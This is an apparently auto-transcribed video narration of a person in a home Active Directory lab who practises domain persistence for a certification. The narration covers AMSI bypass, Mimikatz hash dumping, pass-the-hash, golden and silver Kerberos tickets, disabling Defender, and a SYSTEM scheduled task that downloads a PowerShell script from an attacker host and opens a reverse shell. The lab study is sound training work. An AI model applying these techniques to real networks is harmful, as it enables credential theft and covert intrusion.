Alright, welcome. So today we're going to be looking at domain persistence. If you ever plan on doing anything, or if you ever plan on doing the, what's it called, PMPT, I know that domain persistence is part of that. So we're going to be looking at the golden ticket, and we may be looking at silver ticket also. As you see, I already have a server up and running on my local machine. Alright, it has all my tools and everything in it, and we are already logged into John Doe. So let's go ahead and we'll start to try to do some more stuff with this guy. Let's go ahead and throw an Amsi Bypass in there first, and then we'll go ahead and try to load this into memory and see if we get anywhere with that. See if this guy's actually taking it. Okay, he did. Cool. And it looks like we did. Okay, so let's go ahead and do a get domain controller or get domain. Yeah. Oh, let's do PowerView dev also. And we'll do a get domain controller. Alright, cool. We are back. This guy's already opened up as an administrator, so we are back to right where we were before. Let me see if I can make a session. Sess equals new PS session. And I don't remember the name of the domain administrator. That's kind of why I did this also. What is it? DC01 to computer name. Let's see if we can do that. Okay, we cannot. What about with attack credentials? Credential John.doe. We do it like that, and then put in his password. Okay, so we cannot. What about if we do it with didn't we do it with Hatter-McCaskey last time? Hatter.McCaskey, is that how you say it? Let's try this. I don't really remember what his password was though. So I'm just going to try that one, but it may be... Yeah, okay. So it looks like we're going to have to do some stuff with Mimikatz, maybe try to pass the hash, things like that. Because we're not getting anywhere with this guy, right? So let's go ahead and download Mimikatz again. Invoke Mimikatz, excuse me. Let's try that again. We'll do a Invoke Mimikatz, see if we can do a pass the hash with the administrator. Password and try it like that. Invoke, or let's go ahead, yeah, invoke Mimikatz. Let's try that like right there. We'll see what we can do with that. Now, if you have been watching the past few streams, this one's actually the YouTube versions of it, my own network that we set up here that we've been working on for the past couple days. The last two streams that I did were on a totally different network, and they were only streamed. They aren't ever going to get uploaded to YouTube. This one's the actual ones that are getting uploaded, things like that. And both Mimikatz taking sweet time. Hopefully it actually works for us here. And we can get some type of hash, maybe pass the hash, something like that. And then, you know, try to do a golden ticket like that. Or a silver ticket. So this guy seems to be taking his sweet time. Then we also have an ASREP roasting. Did we also have that too? When we figured out the guy's password and everything. Alright, cool. So we actually invoked Mimikatz finally decided to work. It does take a minute. I mean, it's doing a lot of stuff. Can't really get too mad at it. Alright, we got a lot of John Does here. I thought I also had an administrator on here too. But I think I had to log out and then log in as an administrator and do like that, didn't I, last time? We will try for LSA dump, I guess. Before I do that. This guy doesn't seem to really be caching the accounts like I want to. Command LSA dump LSA/patch. Try it like that and see if we get any different hashes in there, because right now we're just getting John.doe hash everywhere. But I also haven't messed with this guy, I haven't logged into him in a while, things like that, so it could be something like that too. We can also try and invoke user hunter. See if he's allowed any other domains, right? Could try something like that, but if you're watching the YouTube videos and you're just, I like the last one, you're just busting through them or whatever, sorry. You're sitting there like, we already have the hash. I think I actually have Hatter's hash sitting here. Yep, Hatter's hash, like right here. So I still have his hash. Okay, so that's for Hatter McCatsy. Okay. Yeah, so I actually still have his hash, like right there. I guess we could go into John the Ripper over here, huh? So let's try that. Let's go ahead and go into CD, into C drive, users, Ryan. Let's see if we got anything over here first. Alright, the administrator doesn't have an NTLM hash. Let's go ahead and we're just going to log out because it's not saving the accounts properly. So we'll go ahead and we'll switch user. Or whatever, we won't have to log out. We can just switch user. And we're going to do other user. We're going to say administrator. That's because it's not Alice. Oh, I think I actually did mess that one up. Let's try it one more time. Jesus, there we go. Get there one day. And then we'll go ahead and we'll hop back onto John Doe and run that same command again. Okay, cool. Let's go ahead and administrator, go back to John Doe, right? And we'll run that same command again. And then from here we will go to, let's see if we can actually CD and C users Ryan Y. I believe we use John the Ripper, right? Or downloads John, CD and John again. See if we have header hash in, I believe it's in run. Is that correct? Do we have header hash in here? BCV, header hash.text. Okay, cool. So we can do a John check word list equals rocky.text, and then it should be header hash.text, right? And it's probably already saying like, hey, we already cracked this, isn't it? The string is also boom, boom. Okay, let's go ahead and do a contact show, I guess. Or where? I wonder where the john.pop file is for this. No password hash is left to crack. Yeah, because you already cracked them, didn't you? I wonder where the john.pop file is. Is it in here? John.pop. Okay, let's go ahead and delete john.pop. And we'll try to crack that again. Alright, cool. Cracked it as password 1. So we were putting in the correct password for Hatter McCatsy. Alright, administrator still not showing it on NTLM. That's not good. So we are administrator on here. Let's go ahead and do Invoke User Hunter. I don't remember how we got to the domain controller last time. Did we just do it through script block? Maybe session was allowing us it. Is session actually access denied, or is it just not allowing us to do it? Okay, so that one's access denied, but okay, so access is denied. Okay. So I'll make sure that access was actually denied, that's all. Okay, that one seems to be frozen. What about check access? We do have Hatter McCatsy stuff. Could always try to log out and log in as him. I know I got on domain controller last time with Privesk and everything like that. He's still signed in. I wonder if I actually need to sign out of him now. I'll say dump. That's just looking for hashes on the local machine, right? So let's go ahead and do that. And then we're going to sign out of him again. We'll just sign out actually. And then we'll get back in as John.Doe. And then from here, we'll do a invoke Mimikatz. Just straight up invoke Mimikatz. Maybe something like this. Maybe that'll work. We'll find out here in a second. And also, let's go ahead and CD back into my desktop. where all the files are at, just in case if I do actually get in, and we'll go from there. Alright, cool. So we're back in there, right? Invoke Mimikatz is running like right now. It's going to take a minute to run. That's okay. And then we'll see what we can do after this. Hopefully something, huh? Actually, the KRBTG. Well, first we need to get into the domain controller, huh? Okay. So here, there's Alice. Wait, Alice. Username. Look for administrator for the username. For some reason, he just does not want to show up. Administrator, okay. And administrator's password's not showing up though. Why are we having these problems like right here where he's not showing up at all? Let's go ahead and try to go back into administrator again, and we'll try this one more time. Let's switch user. We'll do administrator again. We'll try this one more time. We'll see what happens. This time I'm not going to sign out of it. I'm just going to go straight back into John Doe. Alright, and then we'll try this again. Invoke Mimikatz one more time. Hopefully we get it like this. If not, since in the last video I already did it, I'll probably just go log in as administrator on there. So I just go to a PS session with credentials of administrator or something like that. And we'll go from there. Hopefully we get out the correct way, right? Come on now. Come on now. Header hash. Okay, let's see what we got here. Administrator, there we go. Okay, so now we have the NTLM password for administrator there. Okay, so let's go ahead and do a invoke Mimikatz. You can't see that. Invoke Mimikatz. Attack command. Scroll pass the hash. User is going to be administrator, right? Domain is going to be alice.wonderland.local. NTLM, right, is going to be this guy, and we're going to run Powershell.exe. Alright, obviously, if you were taking a test in real life, we'd obviously save that, and we'd also try to crack it offline. We'd actually get all these NTLMs, try to crack them, see, you know, what how their password policy is, things like that. Which, when I showed in the very beginning with domain enumeration, we can actually get a lot of information for password policies off of that also. Something we have to remember too. Something else I want to talk about is starting to learn these different commands, things like that. Because I would say a week ago, 2 weeks ago maybe, something like that, I could not tell you what pass the hash had in it. I knew I needed an NTLM, I could not tell you anything else. So throughout the time of doing all this, I've really just been continuing to learn more and muscle memory more and just really just, understand more and more what's going on. So if I do a who am I, I'm still alice.john.doe, right? If I do assess equals new PS session to computer name, right? And we want to get that net domain controller, right? To this guy right here, because I want the DC computer name, right? DC01 to him. We should now have a session, and I do. So if I now do a invoke command, and we'll say script block, who am I, host name, right? Tax session net sess. Yeah, all these commands like right here, I just learned that not too long ago. So every day I'm just happy that from CRTP what I've learned and things like that. The class alone, it's because it's like $249 like right now. Just the class alone is amazing. Even without tests, things like that, just the class alone has taught me so much. What's up, sweetheart? Oh, I'm gonna get a kiss. Oh no, I'm not. Okay. Ooh, you're red. Why don't you give it to me?
I didn't realize that much of my back was exposed.
Oh, I'm sorry. Can I have a kiss? Don't want YouTube to say that. It's not allowed. Yeah, whatever it is. No, they YouTube. One time I was on Kelly Lake, so they got Kelly, and it blocked the video for like naked something, like someone was naked. I'm like, what are you talking about? Watched the whole thing, no idea what they're talking about. So I don't know. Okay, but we do an invoke command right script block. Who am I host name? And we see I am Alice on the Alice domain as an administrator, and we are on DC01. So if we do a enter PS session now for session $sess, we are now here, right? So let's go ahead and do an IEX, or let's first, let's try IEX, IWR, HTTP. I forgot what my IP address was over here. IP config. I do need my 192 address because it can ping that, remember. So let me go ahead and do a Python. Okay. Boom. / invoke mimikatz. PS1. There we are. Might tell me no. Might just take it. We'll sign out here in a second. Alright, it just took it. Gave it to me. Okay, thank you. Alright, so from here, we should always do a who am I /priv also. We should always do that, right? Everything seems to be enabled, so we're pretty much golden, right? And now we're going to make a golden attack, right? So let's go ahead and do an invoke mimikatz attack command. Okay, and we're going to do an LSA dump. LSA, I believe it's just /patch like right here. I believe it's that one. Let me check my notes like real quick. And yep, sure enough, /patch. Alright, and we need the Kerberos ticket granting ticket hash this time. That's what we're going to use for a golden attack or a golden ticket. He's going to take a minute. That's okay. We have time because we're on the system now. They see me rolling. Come on. There we go. Okay. So we see all the hashes here, right? Let's go ahead and get that Kerberos ticket granting ticket hash. Boom. There we go. And let's go ahead and do an invoke invoke mimikatz or mimikatz. Yeah, invoke mimikatz. All right, invoke here attack command. All right, and this time we're going to do a golden ticket attack, right? We do Kerberos golden. Okay, then from here we need a user. It can really be any user you want. So we'll say administrator 1. Let's make up a user, okay? I believe we can do that. I believe we can just make up one. Alright, from here we're going to do a domain. or you can use the user that's already on the box, which is an administrator. We'll say domain, which is going to be alice.wonderland.local for our box here, right? From here, what we're going to do next is going to be the SID, which we can find at the very top of here. There's our SID, /SID. And if you watched the videos from the other day, all of this should start to seem pretty familiar, right? We're going to do /ID 500, because then we're going to be in the administrator's group, which /group. Okay, but it might be actually be groups. So if we go up to this guy, right, we got 502, 503, 500. So we're in the 500 group right now, right? ID 500 groups. We can then say something, within the 500s. I believe I used the same exact group that the Kerberos Grand ticket was on last time, which was 5 whatever. So we're going to say the same exact thing, 502 for group. Let me make sure it's not groups. Yeah, it is actually group. Let me look on here real quick. Okay, it's groups. So that's, and then what are we going to do? We're going to do a /path the ticket attack, right? And I believe that that is everything that we need for this guy right here. And was I even supposed to even do that on him? Is the next question. Yes. I believe I was supposed to do that on my home PC. Not on this one like right here. We're already in this one. So that's not really going to do much for me. So let's go ahead and copy this whole command. I don't know why. As soon as I did it, I was like, wait a minute. Why would I do it on this one like right here? We want to do it. Yeah, that's what I figured. RC40 is okay. Let's go ahead and hop back over to my home machine. There we go. And do it here. Let's go to the user administrator. Why do you have to be administrator? It might have to be someone that already exists. I don't know. Did I forget to put in the KRB? I did. I forgot to put in the KRB TGT actual hash, didn't I? So let's go ahead and try to stop this guy right here. Okay. And then we're just going to throw in right over here. I don't think it actually matters if we throw in that. KRB TGT. And let me go ahead and grab that again from over here. So I need his hash. I'll say, wait a minute. There we go. I wonder why I told us, hey, you need some type of hash. You can't make a ticket for. I'm just gonna make a ticket today. Screw it. Let's see if this works, right? Jeez Louise. As my notes say, also we can also use a DC sync. Okay, which will drop just the Kerberos Grand ticket one. To show the last hash as it shows like right here. Alright, so that's pretty cool like right there. But yeah, we can also just do DC sync for that. For that guy, actually a groups 512 on him, but whatever. Alright, let's see what we got here. So Kerberos CRUD generated, so it looks like we generated everything right. Let's go ahead and do a K-list and see if we actually did. And we do have a Kerberos Grand ticket. Alright, cool. So let's go ahead and do an ls for // well, let's actually look up net domain controller again, right? That's what we just attacked, right? And let's go ahead and do an ls // full v, and then we'll look in the C drive, I guess, see if that works. And it does. As we can see, this does work, okay? ls boom boom, and we can see everything in there, right? Cool. Let's go ahead and try to do this as a non-administrator and see if that works also. Let's go ahead and open up Powershell again, and we will run this as a non-administrator this time. We do have to invoke our IEX IWR 192.168.0.37, I believe it was. Invoke Mimikatz. I just need to get this guy back over here. Okay, of course we can't do that because we didn't do an Amsi bypass. Let's go ahead and do that again. And we're going to try to run the same exact command again without being on an administrator on this guy over here, right? And we'll see if that works for us. We'll see if we can do that ls again. So we copy this ls over here. So we look at stuff or whatever else. But this does count as persistence golden ticket. So you guys know, right? So if you were to do this for something like PMPT by TCM security there, and they do require you to have some type of persistence in it. I know that that's in the test itself, that does require some type of persistence. This would count as persistence right here. I'd probably just make a user, or I would no, golden ticket would probably actually be pretty good. Okay, oh, we can see we also did it for administrator 1 also, right? So that worked over here, the administrator 1 thing, right? So we did just make up a user. And as you can see, we are not on an administrator shelling right now, so we should not be able to see this, and we can. Okay, so we can go see that users. I think we can do it like that. Yep, okay. Ryan. Okay, cool. Now what I'm wondering is if we can actually make a session. Sess equals new PS session with computer name, decor, DC, boom. Let's try that like real quick. Okay, we cannot, alright. We still get, probably it's denied, right? Fine error, no mapping between account names and security IDs was done. Alright, okay. But we can do an ls, can start to look around in there. I'm also wondering if we can do something with stiffs or something like that. Wonder how deep we can actually take this guy. Basically, we can still look in there and can still do stuff. Okay, so we can still look in his desktop. Okay, nothing in it. What about documents? Unless there's nothing in there, but you know, stuff like that. Let's go ahead and actually look at administrator. Okay, then we'll look at desktop. And there's header.txt. Then we can do a type header.txt. Alright, and there we go. Okay. I mean, would they have the Azure roastable header password right there? No, they wouldn't. Okay, no. But that is something that we can do. I wonder if we can do like a copy. Can we copy like something that we have here? So let me do a dir like real quick. Can we copy? Oh, that was dir like right there, wasn't it? Can we copy this guy, right, onto there? So can we copy that to there? Let's copy in the header.txt though. I'm going to copy something to something else. Copy, could we do a copy? Okay. Trying to see if we can copy something like that. Sure, there's a lot more we can do with this than what I'm doing with it like right now. So that was the golden ticket, right? Cool. So whenever I did this, I did do a little boom, boom. Ooh, yeah, we can do stuff like that. We can do a wget. We can do a, what if we can do an invoke expression, IWR, right? HTTP 192.168.0.37. 0.37 slash, let's do Azure Bros master.zip. Let's send something like that, because that's going to be like a bigger file, right? Or not IWR, let's do a wget. Out file is going to equal Add rep roast, right? And we're going to do that for this domain controller all the way onto the desktop, right? For that. Can we do that? Like right there? Ooh, my out file should be, yeah, okay. Good point. This should be my out file like right here, huh? Boom. And then add rep roast. That should be my out file like that. Let's see if we do something like that. And then do a dir in there again. Or and as you can see, as rep roast zip's now in there. So we can run, so we can do something like that. So we can run maybe like a reverse shell, I'm wondering. Could we do something like that on there? Let's see what I got in my notes right here, because I obviously did something, right? Yeah, I can see that I put that in there. But can we run it now? So can we do like a boom, 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 or can we do like an expand archive? Expand archive. Oof, what was that? Fill the create file for why? Let's see what it says. See if I got like a dir. Okay, so it can't, it's filled to do something in there with expand archive, invalid operation. Okay, let's try to put something like power view in there, something a little bit easier. Yeah, wget. Let's try to do like power view and power view dev and things like that. Power up maybe, you know. Let's try power view. .ps1. And now let's go down here and do a power view. .ps1. Alright. Now let's try to go ahead and run that. Ooh. It's got found a threat, huh? In PowerShell power view. Oh, that's weird. But he found it on this machine, not on the domain controller. So let's go ahead and do a dir again. There's power view like right there. And let's try to do a import module. Can I do that? Import module. And then we'll say power view. Can I do something like this? Specify module not found. Oh, it got deleted. Okay. So can I do like some type of like invoke command on that guy? Can I do like an invoke command, right? And then can I do it for this machine like right here? Who am I? Invoke command. Who am I? Can I do that? No. Okay. How would I invoke a command? That would be the script block, right? Script block, right? Who am I? And we're still not on a specialized guy here. Then can I do attack computer name? Because we don't have a session with him, right? So we can't do that. Just trying to figure out what else. Because we can put stuff on there and everything down. I'm trying to get that stuff to actually be able to run. If we can. Because that would be pretty sweet, I think. So we can type. We can do that. We can see different things on there. So I feel like we should be able to run different stuff on there. Let's try that power view again one more time. It definitely sees it. I wonder if we can do a... We can't do like an invoke command. I wonder if we can do... We do power view dev. .ps1. No, okay. What about power up? Okay. It's still there, okay. Can we do something like a period slash power view dev .ps1. I don't think it's gonna work. I don't think so. Can we do an import module? Yes, not found because they already deleted it. Yeah, okay, deleted both of those. Okay, so now we have to do some sort of bypassing, things like that. What else do we have on here? Let's see what we can do. That is going to show up as like a fire, some of that. I want to do a dir like real quick. That's text. I want to actually run something on here. Power up, power cat. Can we do a power cat? Can we put that on there? Or is that not going to work either? I don't even have the thing run, do I? There we go. Now server's run. There we go. Okay, cool. Nope, found that. What about an invoke Powershell TCP PS1? What about something like that? Could do that guy right there. Yeah, see, everything's hitting everything's trying to be loaded onto there, so that's not really helping me out very much now, is it? Can I do an IEX IWR? IEX IWR. That whole thing, right? Boom, boom. Okay. What do I do with that though? Can I do that? Is that even possible? How do I... Can I do like an invoke? This would have to be something I would have to mess with later on. Let's go ahead and do the... Or if somebody else has an idea, let me know. And we'll go from there, okay? But let's go ahead and do the... Because if I could like set MP preference, I mean, yeah, we could go through and try to obfuscate everything and all that good stuff. But we don't really have the time for that like right now. Let's go ahead and look at silver ticket. How about that? We'll do silver ticket tactic real quick, guys. And with the silver ticket, we're pretty much going to be doing the same exact thing. All right. Just I mean, kind of like to say that thing. I don't know if we can actually even do a silver ticket on here. We'll try it. We'll see what we can do. Let's go ahead and hop back over into this guy over here, right? And we'll do an invoke mimikatz again. Alright. Let's go ahead and do a invoke mimikatz. Tech command. LSA dump. LSA, right? And I believe it's /patch, I believe we're doing for this one. If I remember correctly. Yep, LSA /patch. Okay, cool. /patch. Alright. Now, supposedly silver tickets are harder to find also than golden tickets, just so you guys know. They're quieter from what I've read and things like that. Alright, and we are actually going to be using a machine this time. Here you see we're using Decor CI for this one over here, right? Or Decor DC. This one right here. So we are going to be using the machine this time and not the, what is it? I actually used Decor Management on that one. Did that work for me? I used Decor Management on that one? Huh. It's weird because RC4, that's funny because RC4 is the Decor Management one. I think I was supposed to be using Decor Domain Controller. I think I might have messed up somewhere. But that's okay. Alright, let's see if this works. Let's try to get to that Decor DC01. There we go. Okay. So this time what we're going to do is let's go back to a non-administrator shell, right? And let's go ahead and do invoke mimikatz. Okay, that command, right? Kerberos. It's going to be called golden again, even though it is a silver ticket attack. We're going to do golden again, okay? That's just how it is, how the syntax is for it. Domain, it's going to be alice.wonderland.local /RC4. It's going to be the computer hash, right? So we got that $, so we know it's computer DC01. Right, boom, right there, okay? We do need a user again. I believe we can actually make up a user again, but this time we're just going to write down administrator. /user will be administrator. We'll say administrator 2. See if we can make one up again, right? The SID, right, looks like. The target for the system I wonder if I actually did decore management just to have a different, because decore management talk to domain controller probably. But we're going to leave it how I have it like right now on my other thing, right? So the target for it, right? Which target is going to be DC01 dot, right? Isn't that the computer name? I forget what the computer name is. Just go ahead and check it out like real quick. We are in there. It's not like, you know, we have to do some investigating or anything like that. So there's the SID. We do need that, like right there. And let's go ahead and do a host name. DC01 dot alice.wonderland.local. Okay. Whoops. Keep doing that. So DC01 dot alice.wonderland.local. SID. We are going to need that SID in there, right? Boom. And that could be it. SID, service, sifs, and then pass the ticket. So we'll try it like that. Say /service, which could be sifs, and then /pass the ticket, right? I believe that's it. So I got Kerberos Golden, I got the domain, RC4, which is NTLM hash, the user, the target, SID, and the service. I believe that that is everything that I need, but we are about to find out. Let's go ahead and see if that's everything that I need there. I'm clicking around everywhere. I apologize for that. So we have Kerberos Golden, the domain, the SID, the target, the service, the user, and yeah. Where's RC4 though? Yeah, an RC4. Okay, cool. So let's try that one like real quick. Almost did it again, didn't I? Yeah, no, I'm good. Boom, boom. All right, let's go ahead and try that, and we'll see what happens. Let's see if I have to use a different machine, maybe? I don't know. I don't know how many machines on there that I've ever actually logged into, or that are actually even up and running. But we'll try this. What do I use for the SID over here? Did I use the, oh, no, SID's going to be the same no matter what. Never mind. We'll see if this one works. If not, then I need a totally different machine, because like that needs to be up and running. And that's going to take a lot longer than what I very first allotted for this video. So I still have quite a few things to do today, so, or tonight, for my own studying, so you know. We're getting there. Come on now. This would also be considered persistence too. If this works, this would also be considered persistence, okay? So if we do a K-list, looks like it actually did work. We have administrator for SIFs, okay? So let's go ahead and try doing LS again. This time we're using a computer name. Whoops. I hit end. Okay, there we go. Yeah, end. I hit page down. And that does work. So there we go. Okay, so we did create a silver ticket now. Okay. And we can do stuff inside of here again. /users /administrator desktop, and we can try to do that type again. Type, boom. Oh yeah, header.txt. That's why I can't type nothing. Ooh, did I mess up header.txt? That's because I put azrep roasting. I copied it into header.txt. So obviously that copy did work. All right, cool. And it kicked me out too. But no, it didn't kick me out. Excuse me. Yeah, it's working just fine. All right, so that did work just fine. So that is a golden and a silver ticket attack link right there, right? So from here, with the host, we can do some cool things to create scheduled task. So from this one, like right here, what we did was we actually created a scheduled task that would run PowerShell.exe, download it, the PowerShell TCP PS1, right? And then obviously from there, it would connect back to me, okay? And it would be like NT authority system on there. I guess we could technically try to do that. If it's going to take it. That's the real question. I want to figure out how to do it, like an invoke command or something. That's what I really want to do. We might actually be able to get into a session now because we have, let's try it. We have sifs on there. A specified logging session not exist. May already have been terminated. Okay, so I think we can actually do that with actual. Because I've gotten that before, that I've like closed out and came back in and it's worked. But if I close out here, my K list is going to be gone. But we could run a scheduled task, just like I'm showing over here. And that scheduled task could then have a callback to me, but I don't know if Invoke Powershell TCP is going to work. Let's go ahead and let's give it a try. Okay, I'm going to go ahead and kind of minimize this guy down like a little bit, right? Just like I did before, kind of something like that, right? Okay, we're going to go back to my shell that's not an administrator or anything. There we go. And we're going to try to do a scheduled task. Scheduled task, create, and we're going to do it on DC01, right? .alice.wonderland.local, 01 weekly. Okay, it's going to run as a user NT authority system. Okay. Beyond ST check. Okay. We are going to run PowerShell.exe. From here, that's then going to run IEX. I wonder if I can actually do an IWR. I should be able to. IWR HTTP that 192.168.0.37, right? I'm just going to connect back to me, right? Slash invoke PowerShell TCP.ps1, right? And then I think I need, within that invoke PowerShell TCP.ps1, I think, I'm going to need it to run something at the end there. So I think I'm going to have to open that one up and actually have it run like its whole command line thing at the end. Access is denied. That's the same thing up here. What did I do differently on this one? Okay, let's try it again. Schedule task create /s on that machine. SC weekly RUNT authority system. TN ST check. TR PowerShell.exe blah blah blah. AX new object blah blah dollar string. Boom boom. And why did I get that was denied? Because I got to save that thing up there. It looks like I just pressed up and did it again. It works just fine. Can I still ls into this guy? Oh, probably have to ls in the C drive, huh? Okay, so I can still ls into him. So what's going on with this over here? Schedule task. Do I have to do like a // or something like that? Network address is invalid. DC01, right. .alice.wonderland.local, DC01 alice.wonderland.local. Did I spell something wrong over here? Dcord, DC, $, money core, local, SC weekly. Guys, keep hitting enter until it works. Let's keep getting access is denied. What if I can do it with the golden ticket one? That's what we created. What am I doing different here that I did up here? NT authority system. CNST check. TR PowerShell.exe. What did I mess up? Down the string. I mean, it looks the exact same now, doesn't it? For some reason up there on my notes it works. Down here it does not. Do I do something like that? No, I didn't think so. Access denied. Name is ST check. Maybe change the name. ST check 1. I don't know what that's gonna do. Access denied. Why? Why denied? Maybe try to do it on the administrator shell. Can you still get into them? You can. Okay. This is with the golden ticket though, right? This one's with golden, not silver ticket. We should be able to do it with either one. access denied. Okay, so still saying access denied. I don't know. Now, why wouldn't I just create this? Because if we had the golden ticket, then we already obviously got into. No, I guess we don't technically have to get into domain controller. We just have to have rights to it, right? Not rights to it, but, you know, we would have to have some type of what is it? Is it because I didn't capitalize DC? I mean, I don't think so. This thing does not care about that at all. I'll say we just have to be able to do like script blocks and whatever with it, huh? Man, this is difficult. I don't know. Why do I have 3 at the beginning there? Why does it do something like that? That's what's kind of confusing me, like right there too. I don't think I need all that crap. Okay, well, I don't know. Maybe we won't be able to do something like this like right now. Okay, what's that say? So, doesn't say access. Oh, yeah. Doesn't say access denied this time. So we have that. So it should go. Yeah, like that, right? Maybe like that. Something like that. Is that it? How it should go? No argument. Trying to close out this one, right? That's what I should be doing over here, right? Maybe I don't need that. Right there. Access denied. Damn. Okay. Well, maybe I won't be able to get with this one. Wonder if it's because the firewall's still on. So I'm just going to go into it and I'm just going to tear down the firewall. You know what? Let's do it like this. I know this is kind of cheating. Right? But right now I just want to see why it's not working. Let's go ahead and try this. Okay, let's go ahead and try that again. So I feel like if I'm already getting, because I already got Mimikatz, everything that there, right? So I feel like then I already have some type of, I can already like invoke a command in there and stuff, right? So couldn't I just do a scheduled task on the actual thing itself? Like, why am I trying to do it through a golden ticket or whatever? But I could literally just run the scheduled task by itself, couldn't I? That's what I don't understand. Why would I run it through that? And then have it call back to me, right? So if I go back to my, let's see if this works right here. Because I feel like it should have worked the other way. It kept getting access denied, but my K-list is showing that access shouldn't be denied. But that could also be what I'm, you know, what I'm allowed to do, things like that, administrator stuff. But that could be a lot of different things. But let's go ahead and look at what I want to look. I want to look at my notes here. Get back into here, and I want to go ahead and actually want to look at the Invoke Actually, I want to look at Invoke Powershell TCP in here. I do not want you to run. I want you to actually go to open with Notepad. I want to look at the very bottom of it. Pretty much what I want to do is, I think before or even after it closes out, I want to do an Invoke Powershell, or Invoke, Powershell TCP, TAC reverse, TAC IP is going to be whatever my IP address is back over here, right? So if I go into here, IP config, .10.0.0.22. I want to see if this works like right here. 10.0.0.22 TAC port. We'll say 443. Let's go ahead and save that like real quick, and let's do a PowerCat. Oh, I'm in the wrong thing, aren't I? Actually, need to get PowerCat on here first, don't I? So let's go ahead and do an IEX, IWR 192.168.0.37. Jesus, 37. PowerCat.ps1. Okay, and let's go ahead and do a PowerCat. TAC L, TAC B, TAC P 443, and allow access to everywhere in the world. Since you're a freaking VM, I don't care. And then we'll go in here, even though you should care, but still. We'll go into here and let's go ahead and run that scheduled task. Let's see if it actually makes that callback. And let's see if it actually downloads everything, stuff like that. So we want to now run that, right? So if I go to scheduled task, run S, or maybe I can do it from over here, because that'll be cool too. If I go into scheduled task slash, what is it now? It's slash run slash S on DC01, boom, boom. Right. And then what task to actually run, task name, ST check. And I need test check 1, I think. Actually, it's not. Okay, let's go ahead and try to run it from the actual thing itself. Because this would be a weekly RAM program. Why it's actually telling me that I'm denied over there. Attempting to run scheduled task, ST check 1. Let's see if, okay, so Invoke Powershell TCP did get a call, right? It did download it, right? Let's go ahead and hop back over to here and let's see if it actually worked over here. Oh, we got timeout. Okay, let's try again. So we're not getting that callback over here now, are we? On PowerCat, who's listening on 10.0.0.22. And I don't know if maybe I messed up somewhere with this guy over here. If I should have actually put him like, I think I actually have the printout on my notes. Where I put that? Nope, Invoke Powershell TCP TAC reverse TAC IP address. Oh shit. Yeah, IP address. TAC port. I don't think I actually need to put an IP address. I think you just need to say IP. TAC IP address, TAC port. Okay. So it actually looks pretty good. Is it even called Invoke Powershell? It's called Power. Function is Invoke Powershell TCP. Okay. And I do have Invoke Powershell TCP. Okay. Save that again. And let's try to run that again. Try one more time to run that. PowerCat does like to close itself down for no apparent reason. It doesn't look like it's actually running back to here now, does it? For 10.0.0.22 on port 443. Even though my notes, I was able to get it to work. Now, wasn't I? And did I do a TAC reverse in there? Pretty sure I did. TAC reverse, TAC IP address 10.0.0.22, TAC port 443. Yeah, that's the same thing. Okay. So I'm wondering if it's because this other one, it's actually, no, it's only in the memory, isn't it? AX new object, net.web client, download string. Yeah, I think it's running in memory. Like right there. Okay, let's go ahead and hop back over in here again. And ST check 1. Okay, ST authority system. Schedule task. Just trying to run on there. weekly and see authority system as Powershell.exe, or if I actually need to do this whole thing again for the scheduled tasking again. I can't find the damn scheduled tasking. That's weird. Okay, let's go ahead and copy this whole thing. Do a Control V, or if I actually do need to do a Powershell.exe, and then maybe do something like this. Maybe do something like that. Do you want to replace it? Well, yes, but didn't really give me the choice. Let's try it with SD check this time. Okay, now let's try to run that one then. And this guy probably already died, right? Yep. Let's try that one. Attempted to run it. Nothing over here. Well, I'm sure we can get this guy to work if we kept messing with him. And it is downloading over here, right? Yes, it is downloading. Okay, so Invoke Powershell TCP.ps1 is downloading. We are in the correct directory, correct? C drive, tools, or whatever it is. This PC uses desktop, tools. Okay, not that one. Whoops. I was wondering why it looks so weird. Right click, properties, C users, round 1, desktop search, P tools, tools. Okay, so we are in the correct directory as far as I can tell. Over here, tools. Okay, so it's not downloading like a different one or something like that. I'm sure that we could get this to work. I wonder if there's, you know what I'm also wondering? If something's blocking it from being ran. So let's go ahead and come over here and let's see if something's blocking it from being ran. So let's see if we get any thing over here. Let's go ahead and try to run that scheduled task again. Okay. And we will do, whoopsie daisy. Come into here, we'll try to run a scheduled task again. I kind of want to just watch this guy over here. Push it at him like this, like that. See if anything's actually blocking it. It's not looking like it now, is it? Oh, updates are available. Okay. Don't care. Update history. Okay. Still not getting anything back over there. Now what I'm wondering if we can open up PowerShell. If we can do that same exact one, right? We'll call this one 2 or something like that. So let's do check 2. Okay, I want to see if we can open up PowerShell.exe, have it run that. Set MP preference. Let's try something like this, where we disable real-time monitoring. You never know. Oh, yeah, that's probably right there. MP preference is true. Boom. That's not correct. How you got in the middle of those two things, I will never know. Well, no, because we already disabled real-time monitoring now, didn't we? So I'm wondering if maybe I need to do like a Powershell Amsi Bypass now. Let's try something like that. We shouldn't have to because we're not actually doing anything with that. Or maybe we can do a Powershell and then maybe we can do a wget and see if it actually downloads onto that other guy. Let's try that. Powershell wget 0.37 / invoke TCP or invoke what was it called again? That command there. Invoke PowerShell TCP .ps1 out file. It's going to be invoke PowerShell TCP.ps1, right? And then that guy period / invoke PowerShell TCP.ps1. Invoke PowerShell TCP TAC reverse TAC IP address 10.0.0.22 port or TAC port 443. I try something like that, I wonder. And that's SD check 2. Okay, so SD check 2 has been successfully created. And let's try to run it. Tempted to run it. Let's see if we actually get anything over here. I did not see anything new pop up. Let's see if we get anything over here. I don't know where it actually even show up now I think about it. I don't know where we're actually at even in here. Oh, it's going to be in scheduled task. Don't know where it's going to download it to. But I don't see anything even being downloaded over here, huh? So that one definitely did not work, I don't think. Yeah, 8:26, 58 seconds. Yeah. So that one did not download like right there. That wget didn't work. None of that worked like right there. Oops. Let's call this one 3. We'll try to run 3 now. Let's see if we get anything back over here. Okay, so we did. 8:34, we got something new, right? So let's see if that did anything. Let's try to run a scheduled task again. I wonder if it's doing it. Okay. I wonder if I actually have to download it somewhere. Like, into like, let's try to actually download this guy to somewhere, huh? Tech out file, Invoke. Tech out file is going to be, we'll say, see that. Users, administrator, desktop. Then we can actually see if it actually does it, you know what I'm saying? And we'll call this one number 4. Now it's kind of really watch out these guys right here. Okay, so that's been created. Let's try to do number 4 here. Let's see if we get anything. Let's go back to over here, see if we got something in desktop now, which we are not getting anything in desktop. And according to this guy, download though. Oh, we do have something in desktop, okay. But we're not getting a callback, are we? This is the correct IP config. That is the correct IP address, right? 10.0.0.22. Okay, cool. And you can ping. Okay, cool. And so everyone can ping each other, all that good stuff. He's just waiting now for a connection. So it did download back over there. I wonder if it can't do these like little guys like right here. I think it's getting lost with that. Okay, so we know that it did download. Now let's try to make sure that we are actually doing like a, so 